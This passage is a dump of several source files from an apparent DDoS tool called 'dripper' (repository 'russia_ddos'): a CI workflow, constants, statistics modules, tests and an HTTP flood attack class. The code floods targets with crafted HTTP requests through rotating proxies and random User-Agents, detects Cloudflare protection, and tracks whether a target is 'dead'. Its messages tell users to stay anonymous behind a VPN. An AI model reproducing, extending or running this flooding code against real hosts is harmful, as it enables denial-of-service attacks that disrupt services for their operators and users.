"GIT_BRANCH=$GIT_BRANCH" >> $GITHUB_ENV 42 | 43 | - name: Setup Python packages 44 | run: | 45 | python3 -m pip install -r requirements.test.txt 46 | python3 -m pip install pytest-github-actions-annotate-failures 47 | python3 -m pip install --upgrade pip -e . 48 | 49 | - name: Fast attack test 50 | if: runner.os == 'Linux' 51 | run: | 52 | dripper -t 1 -s https://httpbin.org:443 --dry-run 53 | 54 | - name: Run Tests with coverage 55 | run: python3 -m pytest tests/ -v 56 | 57 | - name: Set up QEMU 58 | if: runner.os == 'Linux' 59 | uses: docker/setup-qemu-action@v1 60 | 61 | - name: Set up Docker Buildx 62 | if: runner.os == 'Linux' 63 | id: buildx 64 | uses: docker/setup-buildx-action@v1 65 | 66 | - name: Configure Docker metadata 67 | if: runner.os == 'Linux' 68 | id: meta 69 | uses: docker/metadata-action@v3 70 | with: 71 | images: ${{ env.IMAGE_NAME }} 72 | tags: | 73 | type=ref,event=branch 74 | type=ref,event=pr 75 | type=semver,pattern={{version}} 76 | type=semver,pattern={{major}}.{{minor}} 77 | type=semver,pattern={{major}} 78 | 79 | - name: Login to Docker Hub 80 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 81 | uses: docker/login-action@v1 82 | with: 83 | username: ${{ secrets.DOCKERHUB_USERNAME }} 84 | password: ${{ secrets.DOCKERHUB_TOKEN }} 85 | 86 | - name: Build and push 87 | if: runner.os == 'Linux' 88 | uses: docker/build-push-action@v2 89 | with: 90 | context: . 
91 | platforms: linux/amd64,linux/arm64,linux/ppc64le,linux/s390x,linux/386,linux/arm/v7,linux/arm/v6 92 | push: ${{ github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' }} 93 | tags: ${{ steps.meta.outputs.tags }} 94 | labels: ${{ steps.meta.outputs.labels }} 95 | 96 | - name: Update Docker Hub Description 97 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 98 | uses: peter-evans/dockerhub-description@v2 99 | env: 100 | DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }} 101 | DOCKERHUB_PASSWORD: ${{ secrets.DOCKERHUB_PASSWORD }} 102 | DOCKERHUB_REPOSITORY: ${{ env.IMAGE_NAME }} 103 | 104 | - name: Get the release version 105 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 106 | id: get-version 107 | run: | 108 | echo "::set-output name=version::${GITHUB_REF#refs/tags/}" 109 | 110 | - name: Prepare Release Notes 111 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 112 | run: | 113 | ./.github/release-notes.sh ./CHANGELOG.md > ./release-notes.md 114 | 115 | - name: Update Release notes 116 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 117 | uses: ncipollo/release-action@v1 118 | with: 119 | token: ${{ secrets.GITHUB_TOKEN }} 120 | name: ${{ steps.get-version.outputs.version }} 121 | tag: ${{ steps.get-version.outputs.version }} 122 | bodyFile: "./release-notes.md" 123 | allowUpdates: true 124 | 125 | - name: Fast attack test using Docker 126 | if: github.event_name == 'push' && !startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 127 | run: | 128 | docker build -t alexmon1989/dripper:ci-test --no-cache --rm . 129 | docker run -i --rm alexmon1989/dripper:ci-test -t 1 -s https://httpbin.org:443 --dry-run 130 | -------------------------------------------------------------------------------- /ripper/constants.py: -------------------------------------------------------------------------------- 1 | from _version import __version__ 2 | 3 | ############################################### 4 | # Constants | Logo and help messages 5 | ############################################### 6 | VERSION = f'v{__version__}' 7 | USAGE = 'Usage: %prog [options] arg' 8 | EPILOG = 'Example: dripper -t 100 -m tcp-flood -s tcp://192.168.0.1:80' 9 | GITHUB_OWNER = 'alexmon1989' 10 | GITHUB_REPO = 'russia_ddos' 11 | GITHUB_ID = f'{GITHUB_OWNER}/{GITHUB_REPO}' 12 | GITHUB_URL = f'https://github.com/{GITHUB_ID}' 13 | 14 | LOGO_COLOR = f'''[deep_sky_blue1] 15 | ██████╗ ██████═╗██╗██████╗ ██████╗ ███████╗██████═╗ 16 | ██╔══██╗██╔══██║██║██╔══██╗██╔══██╗██╔════╝██╔══██║ 17 | ██║ ██║██████╔╝██║██████╔╝██████╔╝█████╗ ██████╔╝[bright_yellow] 18 | ██║ ██║██╔══██╗██║██╔═══╝ ██╔═══╝ ██╔══╝ ██╔══██╗ 19 | ██████╔╝██║ ██║██║██║ ██║ ███████╗██║ ██║ 20 | ╚═════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ 21 | [green]{VERSION} 22 | [grey53] 23 | It is the end user's responsibility to obey all applicable laws. 24 | It is just like a server testing script and Your IP is visible. 25 | Please, make sure you are ANONYMOUS! 
26 | 27 | [u blue link={GITHUB_URL}]{GITHUB_URL}[/] 28 | ''' 29 | 30 | LOGO_NOCOLOR = f''' 31 | ██████╗ ██████═╗██╗██████╗ ██████╗ ███████╗██████═╗ 32 | ██╔══██╗██╔══██║██║██╔══██╗██╔══██╗██╔════╝██╔══██║ 33 | ██║ ██║██████╔╝██║██████╔╝██████╔╝█████╗ ██████╔╝ 34 | ██║ ██║██╔══██╗██║██╔═══╝ ██╔═══╝ ██╔══╝ ██╔══██╗ 35 | ██████╔╝██║ ██║██║██║ ██║ ███████╗██║ ██║ 36 | ╚═════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ 37 | {VERSION} 38 | 39 | It is the end user's responsibility to obey all applicable laws. 40 | It is just like a server testing script and Your IP is visible. 41 | Please, make sure you are ANONYMOUS! 42 | 43 | {GITHUB_URL} 44 | ''' 45 | 46 | BANNER = '\n\n[r][deep_sky_blue1]#StandWith[bright_yellow]Ukraine[/]' 47 | CONTROL_CAPTION = f'[grey53]Press [green]CTRL+C[grey53] to interrupt process.{BANNER}\n' 48 | 49 | DEFAULT_CURRENT_IP_VALUE = '...detecting' 50 | HOST_IN_PROGRESS_STATUS = 'HOST_IN_PROGRESS' 51 | HOST_FAILED_STATUS = 'HOST_FAILED' 52 | HOST_SUCCESS_STATUS = 'HOST_SUCCESS' 53 | 54 | # ==== Badge templates ==== 55 | BADGE_INFO = '[bold gray0 on cyan] {message} [/]' 56 | BADGE_WARN = '[bold gray0 on orange1] {message} [/]' 57 | BADGE_ERROR = '[bold white on red1] {message} [/]' 58 | 59 | 60 | # ==== Formats and Constants 61 | DATE_TIME_FULL = '%Y-%m-%d %H:%M:%S' 62 | DATE_TIME_SHORT = '%H:%M:%S' 63 | 64 | 65 | # ==== Defaults for Input ARGS === 66 | ARGS_DEFAULT_PORT = 80 67 | ARGS_DEFAULT_THREADS_COUNT = 'auto' 68 | ARGS_DEFAULT_HEALTH_CHECK = 1 69 | ARGS_DEFAULT_HTTP_ATTACK_METHOD = 'GET' 70 | ARGS_DEFAULT_HTTP_REQUEST_PATH = '/' 71 | ARGS_DEFAULT_SOCK_TIMEOUT = 1 72 | ARGS_DEFAULT_PROXY_TYPE = 'socks5' 73 | 74 | 75 | # ==== Defaults ==== 76 | GEOIP_NOT_DEFINED = '--' 77 | CONNECT_TO_HOST_MAX_RETRY = 5 78 | MIN_SCREEN_WIDTH = 100 79 | MIN_UPDATE_HOST_STATUSES_TIMEOUT = 120 80 | SUCCESSFUL_CONNECTIONS_CHECK_PERIOD_SEC = 300 81 | NO_SUCCESSFUL_CONNECTIONS_DIE_PERIOD_SEC = 300 82 | HTTP_STATUS_CODE_CHECK_PERIOD_SEC = 10 83 | UPDATE_CURRENT_IP_CHECK_PERIOD_SEC = 60 84 | TARGET_STATS_AUTO_PAGINATION_INTERVAL_SECONDS = 5 85 | MIN_ALIVE_AVAILABILITY_PERCENTAGE = 50 86 | DEFAULT_LOG_LEVEL = 'warn' 87 | DEFAULT_LOG_SIZE = 5 88 | MAX_AUTOSCALE_CPU_PERCENTAGE = 80 89 | MAX_FAILED_FAILED_AUTOSCALE_TESTS = 5 90 | DEFAULT_AUTOSCALE_TEST_SECONDS = 0.5 91 | DEFAULT_MIN_RND_PACKET_LEN = 1 92 | DEFAULT_MAX_RND_PACKET_LEN = 1024 93 | 94 | # ==== Sockets ==== 95 | PROXY_MAX_FAILURE_RATIO = 0.8 96 | PROXY_MIN_VALIDATION_REQUESTS = 8 97 | 98 | 99 | CLOUDFLARE_TAGS = [ 100 | 'cloudflare', 101 | 'cf-spinner-please-wait', 102 | 'we are checking your browser...', 103 | 'Cloudflare Ray ID' 104 | ] 105 | 106 | # ==== Error messages ==== 107 | GETTING_SERVER_IP_ERR_MSG = 'Can\'t get server IP. Packet sending failed. Check your VPN.' 108 | NO_SUCCESSFUL_CONNECTIONS_ERR_MSG = 'There are no successful connections more than 2 min. ' \ 109 | 'Check your VPN or change host/port.' \ 110 | 'If you are using the proxylist then proxy validation might be in progress.' 111 | YOUR_IP_WAS_CHANGED_ERR_MSG = 'Your IP was changed!!! Check VPN connection.' 112 | CANNOT_SEND_REQUEST_ERR_MSG = 'Cannot send Request or Packet. Host does not respond.' 113 | NO_MORE_PROXIES_ERR_MSG = 'There are no more operational proxies to work with host.' 
114 | MSG_YOUR_IP_WAS_CHANGED = 'IP changed' 115 | MSG_CHECK_VPN_CONNECTION = 'Check VPN' 116 | MSG_DONT_USE_VPN_WITH_PROXY = 'Do not use VPN with proxy' 117 | NO_CONNECTIONS_ERR_MSG = f"There were no successful connections for more " \ 118 | f"than {NO_SUCCESSFUL_CONNECTIONS_DIE_PERIOD_SEC // 60} minutes. " \ 119 | f"Your attack is ineffective." 120 | TARGET_DEAD_ERR_MSG = "[orange1]Target should be dead!" 121 | NO_MORE_TARGETS_LEFT_ERR_MSG = 'No more valid targets left' 122 | -------------------------------------------------------------------------------- /ripper/stats/target_stats_manager.py: -------------------------------------------------------------------------------- 1 | from collections import defaultdict 2 | 3 | from ripper.stats.packets_stats import PacketsStats 4 | from ripper.stats.connection_stats import ConnectionStats 5 | from ripper.stats.utils import Row, build_http_codes_distribution, rate_color 6 | from ripper import common 7 | from ripper.constants import * 8 | from ripper.health_check_manager import HealthStatus, AvailabilityDistribution 9 | 10 | Target = 'Target' 11 | 12 | 13 | class TargetStatsManager: 14 | """Encapsulates target-related statistics.""" 15 | 16 | target: Target = None 17 | """Related target""" 18 | packets: PacketsStats = None 19 | """Collect all the stats about TCP/UDP and HTTP packets.""" 20 | http_stats = None 21 | """Collect stats about HTTP response codes.""" 22 | connect: ConnectionStats = None 23 | """Collect all the Connections stats via Socket or HTTP Client.""" 24 | 25 | def __init__(self, target: Target): 26 | self.target = target 27 | self.packets = PacketsStats() 28 | self.connect = ConnectionStats() 29 | self.http_stats = defaultdict(int) 30 | 31 | def collect_packets_success(self, sent_bytes: int = 0): 32 | self.packets.status_sent(sent_bytes) 33 | 34 | def get_availability_msg(self) -> str: 35 | if self.target.health_check_manager.is_forbidden: 36 | return f'[orange1]Your IP was blocked with anti-bot or anti DDoS[/]' \ 37 | f'\nCheck status - CTRL+click on [u blue link={self.target.health_check_manager.request_url}]link' 38 | 39 | status: HealthStatus = self.target.health_check_manager.status 40 | if status == HealthStatus.start_pending or status == HealthStatus.undefined: 41 | return f'...detecting ({self.target.health_check_manager.health_check_method.upper()} method)' 42 | 43 | avd: AvailabilityDistribution = self.target.health_check_manager.availability_distribution 44 | time_str = common.format_dt(self.target.health_check_manager.last_host_statuses_update, DATE_TIME_SHORT) 45 | accessible_message = f'[{time_str}] Accessible in {avd.succeeded} of {avd.total} zones ({avd.availability_percentage}%)' 46 | 47 | if status == HealthStatus.alive: 48 | return accessible_message 49 | 50 | if status == HealthStatus.dead: 51 | return f'{accessible_message}\n{TARGET_DEAD_ERR_MSG}' 52 | 53 | def get_packet_length_msg(self) -> str: 54 | if self.target.min_random_packet_len == self.target.max_random_packet_len: 55 | return f'{self.target.max_random_packet_len}' 56 | return f'From {self.target.min_random_packet_len} to {self.target.max_random_packet_len}' 57 | 58 | def build_target_details_stats(self) -> list[Row]: 59 | """Prepare data for global part of statistics.""" 60 | sent_units = 'Requests' if self.target.attack_method.lower() == 'http' else 'Packets' 61 | conn_success_rate = self.target.stats.connect.get_success_rate() 62 | 63 | duration = self.target.time_interval_manager.execution_duration 64 | packets_rps = 
int(self.target.stats.packets.total_sent / duration.total_seconds()) 65 | data_rps = int(self.target.stats.packets.total_sent_bytes / duration.total_seconds()) 66 | is_health_check = bool(self.target.health_check_manager) 67 | 68 | _sent_bytes_formatted = common.convert_size(self.target.stats.packets.total_sent_bytes) 69 | _indent = max( 70 | len(str(self.target.stats.packets.total_sent)), 71 | len(_sent_bytes_formatted) 72 | ) 73 | 74 | full_stats: list[Row] = [ 75 | # Description Status 76 | Row('Country, Host IP', f'[red]{self.target.country:4}[/][cyan]{self.target.host_ip}:{self.target.port} [dim](target-{self.target.index})[/]'), 77 | Row('HTTP Request', f'[cyan]{self.target.http_method}: {self.target.http_url}', visible=self.target.attack_method.lower() == 'http-flood'), 78 | Row('Attack Method', self.target.attack_method.upper()), 79 | Row('Random Packet Length (bytes)', self.get_packet_length_msg(), visible=(self.target.min_random_packet_len or self.target.max_random_packet_len)), 80 | Row('Threads', str(len(self.target.attack_threads))), 81 | Row('CloudFlare Protection', ('[red]' if self.target.is_cloud_flare_protection else '[green]') + self.target.cloudflare_status(), end_section=not is_health_check), 82 | Row('Availability (check-host.net)', f'{self.get_availability_msg()}', visible=is_health_check), 83 | Row('Sent Bytes @ AVG speed', f'{_sent_bytes_formatted:{_indent}} @ [green]{common.convert_size(data_rps, "B/s")}'), 84 | Row(f'Sent {sent_units} @ AVG speed', f'{self.target.stats.packets.total_sent:{_indent},} @ [green]{packets_rps} {sent_units.lower()}/s'), 85 | # === Info UDP/TCP => insert Sent bytes statistic 86 | Row('Connections', f'success: [green]{self.target.stats.connect.success}[/], failed: [red]{self.target.stats.connect.failed}[/], success rate: {rate_color(conn_success_rate, " %")}', end_section=True), 87 | # =================================== 88 | Row('Status Code Distribution', build_http_codes_distribution(self.target.stats.http_stats), end_section=True, visible=self.target.attack_method.lower() == 'http-flood'), 89 | ] 90 | 91 | return full_stats 92 | -------------------------------------------------------------------------------- /ripper/actions/http_flood.py: -------------------------------------------------------------------------------- 1 | import random 2 | import re 3 | from contextlib import suppress 4 | from socket import socket 5 | from socks import ProxyError 6 | 7 | from ripper.constants import HTTP_STATUS_CODE_CHECK_PERIOD_SEC 8 | from ripper.context.events_journal import EventsJournal 9 | from ripper.context.target import Target 10 | from ripper.actions.attack_method import AttackMethod 11 | from ripper.proxy import Proxy 12 | 13 | HTTP_STATUS_PATTERN = re.compile(r" (\d{3}) ") 14 | # Forward Reference 15 | Context = 'Context' 16 | 17 | events_journal = EventsJournal() 18 | 19 | 20 | class HttpFlood(AttackMethod): 21 | """HTTP Flood method.""" 22 | 23 | name: str = 'HTTP Flood' 24 | label: str = 'http-flood' 25 | 26 | _target: Target 27 | _ctx: Context 28 | _proxy: Proxy = None 29 | _http_connect: socket = None 30 | 31 | def __init__(self, target: Target, context: Context): 32 | self._target = target 33 | self._ctx = context 34 | 35 | def create_connection(self): 36 | self._proxy = self._ctx.proxy_manager.get_random_proxy() 37 | conn = self._ctx.sock_manager.create_tcp_socket(self._proxy) 38 | 39 | return conn 40 | 41 | def __call__(self, *args, **kwargs): 42 | with suppress(Exception), self.create_connection() as self._http_connect: 43 | 
self._http_connect.connect(self._target.hostip_port_tuple())
44 |             self._target.stats.connect.status_success()
45 |             events_journal.info('Creating HTTP connection...', target=self._target)
46 |             while self.send(self._http_connect):
47 |                 if self._ctx.dry_run:
48 |                     break
49 |                 continue
50 |         self._target.stats.connect.status_failed()
51 | 
52 |     # TODO remove from flood class, status name is not part of flood program
53 |     def _send_event_with_status(self, code: int):
54 |         base = 'Checked Response status...'
55 |         if code < 300:
56 |             events_journal.info(f'{base} {code}: Success', target=self._target)
57 |         elif code < 400:  # 3xx
58 |             events_journal.warn(f'{base} {code}: Redirection', target=self._target)
59 |         elif code == 400:
60 |             events_journal.warn(f'{base} {code}: Bad Request', target=self._target)
61 |         elif code <= 403:  # 401-403
62 |             events_journal.warn(f'{base} {code}: Forbidden', target=self._target)
63 |         elif code == 404:
64 |             events_journal.warn(f'{base} {code}: Not Found', target=self._target)
65 |         elif code < 408:  # 405-407
66 |             events_journal.warn(f'{base} {code}: Not Acceptable or Not Allowed', target=self._target)
67 |         elif code == 408:
68 |             events_journal.warn(f'{base} {code}: Request Timeout', target=self._target)
69 |         elif code < 429:  # 409-428
70 |             events_journal.error(f'{base} {code}: Client Error', target=self._target)
71 |         elif code == 429:
72 |             events_journal.error(f'{base} {code}: Too Many Requests', target=self._target)
73 |         elif code < 459:  # 430-458
74 |             events_journal.error(f'{base} {code}: Client Error', target=self._target)
75 |         elif 460 <= code <= 463:
76 |             events_journal.error(f'{base} {code}: AWS Load Balancer Error', target=self._target)
77 |         elif 500 <= code <= 511:
78 |             events_journal.error(f'{base} {code}: Server Error', target=self._target)
79 |         elif 520 <= code <= 530:
80 |             events_journal.error(f'{base} {code}: CloudFlare Reverse Proxy Error', target=self._target)
81 |         else:
82 |             events_journal.error(f'{base} {code}: Custom Error', target=self._target)
83 | 
84 |     def check_response_status(self, payload: bytes):
85 |         with suppress(Exception):
86 |             if self._ctx.time_interval_manager.check_timer_elapsed(HTTP_STATUS_CODE_CHECK_PERIOD_SEC):
87 |                 check_sock = self.create_connection()
88 |                 check_sock.connect(self._target.hostip_port_tuple())
89 |                 check_sock.send(payload)
90 |                 http_response = repr(check_sock.recv(32))
91 |                 check_sock.close()
92 |                 status = int(re.search(HTTP_STATUS_PATTERN, http_response)[1])
93 |                 self._target.stats.http_stats[status] += 1
94 |                 self._send_event_with_status(status)
95 | 
96 |     def send(self, sock: socket) -> bool:
97 |         payload = self.payload().encode('utf-8')
98 |         try:
99 |             sent = sock.send(payload)
100 |             self.check_response_status(payload)
101 |         except ProxyError:
102 |             self._ctx.proxy_manager.delete_proxy_sync(self._proxy)
103 |         except Exception as e:
104 |             self._target.stats.connect.status_failed()
105 |             events_journal.exception(e, target=self._target)
106 |         else:
107 |             self._target.stats.packets.status_sent(sent)
108 |             if self._proxy is not None: self._proxy.report_success()
109 |             return True
110 |         return False
111 | 
112 |     def headers(self, content: str = '') -> dict[str, str]:
113 |         """Prepare headers."""
114 |         headers = self._ctx.headers_provider.headers
115 |         headers['Content-Length'] = str(len(content))
116 |         headers['User-Agent'] = random.choice(self._ctx.headers_provider.user_agents)
117 | 
118 |         return headers
119 | 
120 |     def payload(self, body: str = '') -> str:
121 |         """Generate payload for Request."""
122 |         body_content = 
f'{body}\r\n\r\n' if body else '\r\n' 123 | headers = '\r\n'.join([f'{key}: {value}' for (key, value) in self.headers(body).items()]) 124 | 125 | request = '{} {} HTTP/1.1\r\nHost: {}\r\n{}\r\n{}'.format( 126 | self._target.http_method.upper(), 127 | self._target.http_path, 128 | self._target.host, 129 | headers, 130 | body_content 131 | ) 132 | 133 | return request 134 | -------------------------------------------------------------------------------- /tests/test_health_check_manager.py: -------------------------------------------------------------------------------- 1 | import pytest as pytest 2 | from collections import namedtuple 3 | from datetime import datetime 4 | 5 | from ripper.context.context import Context 6 | from ripper.health_check_manager import classify_host_status, count_host_statuses 7 | from ripper.constants import HOST_IN_PROGRESS_STATUS, HOST_FAILED_STATUS, HOST_SUCCESS_STATUS 8 | from ripper.headers_provider import HeadersProvider 9 | 10 | Args = namedtuple('Args', 'targets threads_count') 11 | 12 | 13 | class DescribeHealthCheck: 14 | @pytest.mark.parametrize('value, status', [ 15 | (None, HOST_IN_PROGRESS_STATUS), 16 | ([{'error': 'Connection timed out'}], HOST_FAILED_STATUS), 17 | ([{'address': '4.2.2.2', 'time': 0.040173}], HOST_SUCCESS_STATUS), 18 | ([{'address': '172.217.20.206', 'timeout': 1}], HOST_SUCCESS_STATUS), 19 | ([{'address': '172.217.20.206', 'error': 'Exiting subroutine via redo at /usr/local/share/perl/5.24.1/AnyEvent/Handle/UDP.pm line 246.\n', 'time': 0.000176}], HOST_FAILED_STATUS), 20 | ([[1, 0.103471040725708, 'Moved Permanently', '301', '172.217.20.206']], HOST_SUCCESS_STATUS), 21 | ([[0, 0.000416994094848633, 'Bad file descriptor', None, None]], HOST_FAILED_STATUS), 22 | ([[['OK', 0.0316579341888428, '172.217.20.206'], ['OK', 0.0315918922424316], ['OK', 0.0318388938903809], ['OK', 0.0318410396575928]]], HOST_SUCCESS_STATUS), 23 | ([[['TIMEOUT', 3.00089383125305, '121.11.11.11'], ['TIMEOUT', 3.0002110004425], ['TIMEOUT', 3.00109696388245], ['TIMEOUT', 3.00079393386841]]], HOST_FAILED_STATUS), 24 | ([[['OK', 0.0316579341888428, '172.217.20.206'], ['OK', 0.0315918922424316], ['OK', 0.0318388938903809], ['TIMEOUT', 3.0318410396575928]]], HOST_SUCCESS_STATUS), 25 | ([[['OK', 0.0316579341888428, '172.217.20.206'], ['OK', 0.0315918922424316], ['TIMEOUT', 3.0318388938903809], ['TIMEOUT', 3.0318410396575928]]], HOST_SUCCESS_STATUS), 26 | ([[['OK', 0.0316579341888428, '172.217.20.206'], ['TIMEOUT', 3.0315918922424316], ['TIMEOUT', 3.0318388938903809], ['TIMEOUT', 3.0318410396575928]]], HOST_FAILED_STATUS), 27 | ]) 28 | def it_classifies_host_status(self, value, status): 29 | assert classify_host_status(value) == status 30 | 31 | @pytest.mark.parametrize('distribution, statuses_counter', [ 32 | ({"at1.node.check-host.net": [{"address": "95.173.136.72","time": 0.067267}], "ch1.node.check-host.net": [{"address": "95.173.136.72","time": 0.080538}], "de4.node.check-host.net": [{"address": "95.173.136.72","time": 1.078855}], "ir1.node.check-host.net": [{'error': 'Connection timed out'}], "it2.node.check-host.net": [{"address": "95.173.136.71","time": 0.063825}], "md1.node.check-host.net": [{"address": "95.173.136.70","time": 0.159452}], "nl1.node.check-host.net": [{'error': 'Connection timed out'}], "us1.node.check-host.net": None, "us2.node.check-host.net": [{"address": "95.173.136.70","time": 0.13008}]}, 33 | {'HOST_IN_PROGRESS': 1, 'HOST_FAILED': 2, 'HOST_SUCCESS': 6}), 34 | ({}, {}), 35 | ]) 36 | def it_counts_host_statuses(self, distribution, 
statuses_counter): 37 | actual = count_host_statuses(distribution) 38 | assert len(actual) == len(statuses_counter) 39 | for (key, value) in statuses_counter.items(): 40 | assert actual[key] == value 41 | 42 | # slow 43 | @pytest.mark.skip(reason="Use this test only for dev, it can fail because depends from external service.") 44 | def it_can_fetch_host_statuses(self): 45 | args = Args( 46 | # TODO expect target_uri in args as well 47 | targets=['https://httpbin.org'], 48 | threads_count=100, 49 | ) 50 | context = Context(args) 51 | context.__init__(args) 52 | assert len(context.targets_manager.targets[0].host_ip) > 0 53 | 54 | health_check_manager = context.targets_manager.targets[0].health_check_manager 55 | 56 | before_execution = datetime.now() 57 | distribution = health_check_manager.update_host_statuses() 58 | after_execution = datetime.now() 59 | 60 | # some nodes have issues with file descriptor or connection 61 | assert distribution[HOST_SUCCESS_STATUS] > 17 62 | # state should be updated 63 | assert distribution == health_check_manager.host_statuses 64 | assert not health_check_manager.is_in_progress 65 | assert health_check_manager.last_host_statuses_update >= before_execution 66 | assert health_check_manager.last_host_statuses_update <= after_execution 67 | 68 | @pytest.mark.parametrize('args_data, url', [ 69 | ({'target_uri': 'https://google.com', 'health_check_method': 'http'}, 'https://check-host.net/check-http?host=google.com'), 70 | ({'target_uri': 'https://google.com', 'health_check_method': 'http'}, 'https://check-host.net/check-http?host=google.com'), 71 | ({'target_uri': 'http://google.com:92', 'health_check_method': 'http'}, 'https://check-host.net/check-http?host=google.com:92'), 72 | ({'target_uri': 'tcp://google.com:443', 'host_ip': '172.217.20.206', 'health_check_method': 'tcp'}, 'https://check-host.net/check-tcp?host=172.217.20.206:443'), 73 | ({'target_uri': 'udp://google.com:443', 'host_ip': '172.217.20.206', 'health_check_method': 'ping'}, 'https://check-host.net/check-ping?host=172.217.20.206'), 74 | ]) 75 | def it_constructs_request_url(self, args_data, url): 76 | args = Args( 77 | # TODO expect target_uri in args as well 78 | targets=[args_data['target_uri']], 79 | threads_count=100, 80 | ) 81 | context = Context(args) 82 | context.__init__(args) 83 | assert context.targets_manager.targets[0].health_check_manager.health_check_method == args_data['health_check_method'] 84 | if 'host_ip' in args_data: 85 | context.targets_manager.targets[0].host_ip = args_data['host_ip'] 86 | assert context.targets_manager.targets[0].health_check_manager.request_url == url 87 | 88 | @pytest.fixture(scope='session', autouse=True) 89 | def refresh_headers_provider(self): 90 | HeadersProvider().refresh() 91 | -------------------------------------------------------------------------------- /ripper/stats/context_stats_manager.py: -------------------------------------------------------------------------------- 1 | from datetime import timedelta 2 | from math import floor 3 | from rich.table import Table 4 | from rich import box 5 | 6 | from ripper.context.target import Target 7 | from ripper.stats.utils import Row, badge_error, badge_warn 8 | from rich.console import Group 9 | from ripper import common 10 | from ripper.constants import * 11 | from ripper.time_interval_manager import TimeIntervalManager 12 | from ripper.context.events_journal import EventsJournal 13 | from ripper.github_updates_checker import GithubUpdatesChecker 14 | 15 | Context = 'Context' 16 | events_journal = 
EventsJournal() 17 | 18 | 19 | class ContextStatsManager: 20 | _ctx: Context = None 21 | """Context we are working with.""" 22 | 23 | time_interval_manager: TimeIntervalManager = None 24 | guc: GithubUpdatesChecker = None 25 | 26 | def __init__(self, _ctx: Context): 27 | self._ctx = _ctx 28 | self.time_interval_manager = TimeIntervalManager() 29 | guc = GithubUpdatesChecker() 30 | guc.demon_update_latest_version() 31 | 32 | @property 33 | def current_target_idx(self) -> int: 34 | """ 35 | We show one target details at the same time. 36 | Pagination happens automatically. 37 | Method calculates current index of target to display based on script execution duration. 38 | """ 39 | duration = self.time_interval_manager.execution_duration.total_seconds() 40 | cnt = self._ctx.targets_manager.targets_count() 41 | change_interval = TARGET_STATS_AUTO_PAGINATION_INTERVAL_SECONDS 42 | return floor((duration/change_interval) % cnt) 43 | 44 | @property 45 | def current_target(self) -> Target: 46 | return self._ctx.targets_manager.targets[self.current_target_idx] 47 | 48 | @property 49 | def duration(self) -> timedelta: 50 | return self.time_interval_manager.execution_duration \ 51 | if self._ctx.duration_manager.duration is None \ 52 | else self._ctx.duration_manager.remaining_duration 53 | 54 | def build_global_details_stats(self) -> list[Row]: 55 | """Prepare data for global part of statistics.""" 56 | is_proxy_list = bool(self._ctx.proxy_manager.proxy_list and len(self._ctx.proxy_manager.proxy_list)) 57 | 58 | your_ip_disclaimer = f'{badge_warn(MSG_DONT_USE_VPN_WITH_PROXY)}' if is_proxy_list else '' 59 | your_ip_was_changed = f'{badge_error(MSG_YOUR_IP_WAS_CHANGED)} {badge_warn(MSG_CHECK_VPN_CONNECTION)}[/]' if self._ctx.myIpInfo.is_ip_changed() else '' 60 | 61 | full_stats: list[Row] = [ 62 | # Description Status 63 | Row('Start Time, Duration', f'{common.format_dt(self._ctx.time_interval_manager.start_time)} ({str(self.duration).split(".", 2)[0]})'), 64 | Row('Your Country, Public IP', f'[green]{self._ctx.myIpInfo.country:4}[/] [cyan]{self._ctx.myIpInfo.ip_masked:20}[/] {your_ip_disclaimer}{your_ip_was_changed}'), 65 | Row('Total Threads', f'{self._ctx.targets_manager.threads_count}', visible=self._ctx.targets_manager.targets_count() > 1), 66 | Row('Proxies Count', f'[cyan]{len(self._ctx.proxy_manager.proxy_list)} | {self._ctx.proxy_manager.proxy_list_initial_len}', visible=is_proxy_list), 67 | Row('Proxies Type', f'[cyan]{self._ctx.proxy_manager.proxy_type.value}', visible=is_proxy_list), 68 | Row('vCPU Count', f'{self._ctx.cpu_count}'), 69 | Row('Socket Timeout (seconds)', f'{self._ctx.sock_manager.socket_timeout}', end_section=True), 70 | # =================================== 71 | ] 72 | 73 | return full_stats 74 | 75 | def build_target_rotation_header_details_stats(self) -> list[Row]: 76 | cnt = self._ctx.targets_manager.targets_count() 77 | if cnt < 2: 78 | return [] 79 | 80 | duration = self.time_interval_manager.execution_duration.total_seconds() 81 | change_interval = TARGET_STATS_AUTO_PAGINATION_INTERVAL_SECONDS 82 | current_position = duration/change_interval 83 | next_target_in_seconds = 1 + floor(change_interval * (1 - (current_position - floor(current_position)))) 84 | return [ 85 | Row(f'[cyan][bold]Target ({self.current_target.uri})', f'{self.current_target_idx + 1}/{cnt} (next in {next_target_in_seconds})', end_section=True), 86 | # =================================== 87 | ] 88 | 89 | def build_details_stats_table(self) -> Table: 90 | details_table = Table( 91 | style='bold', 92 | 
box=box.HORIZONTALS, 93 | width=MIN_SCREEN_WIDTH, 94 | caption=CONTROL_CAPTION if not events_journal.get_max_event_level() else None, 95 | caption_style='bold', 96 | ) 97 | 98 | details_table.add_column('Description', width=45) 99 | details_table.add_column('Status', width=MIN_SCREEN_WIDTH - 45) 100 | 101 | rows = self.build_global_details_stats() 102 | rows += self.build_target_rotation_header_details_stats() 103 | if self.current_target: 104 | rows += self.current_target.stats.build_target_details_stats() 105 | 106 | for row in rows: 107 | if row.visible: 108 | details_table.add_row(row.label, row.value, end_section=row.end_section) 109 | 110 | return details_table 111 | 112 | def build_events_table(self) -> Table: 113 | events_log = Table( 114 | box=box.SIMPLE, 115 | width=MIN_SCREEN_WIDTH, 116 | caption=CONTROL_CAPTION, 117 | caption_style='bold') 118 | 119 | events_log.add_column(f'[blue]Events Log', style='dim') 120 | 121 | for event in events_journal.get_log(): 122 | events_log.add_row(event) 123 | 124 | return events_log 125 | 126 | def build_stats(self): 127 | """Create statistics from aggregated RAW Statistics data.""" 128 | details_table = self.build_details_stats_table() 129 | events_table = self.build_events_table() if events_journal.get_max_event_level() else None 130 | parts = filter(lambda v: v is not None, [ 131 | details_table, events_table]) 132 